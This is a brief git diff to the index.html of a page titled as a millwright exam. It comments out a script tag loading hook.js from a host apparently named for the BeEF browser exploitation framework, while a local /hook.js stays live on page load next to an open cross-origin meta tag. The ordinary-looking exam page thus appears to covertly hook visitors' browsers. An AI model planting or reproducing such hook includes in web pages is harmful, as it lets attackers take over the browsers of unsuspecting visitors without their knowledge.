Update2 index.html

--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width">
 <meta http-equiv="Access-Control-Allow-Origin" content="*">
-  <script src="https://beef.dset.me:443/hook.js"></script>
+ <!-- <script src="https://beef.dset.me:443/hook.js"></script> -->
      <script src="/hook.js"></script> 
  <title>BAIGE MILLWRIGHT EXAM </title>
     <style>
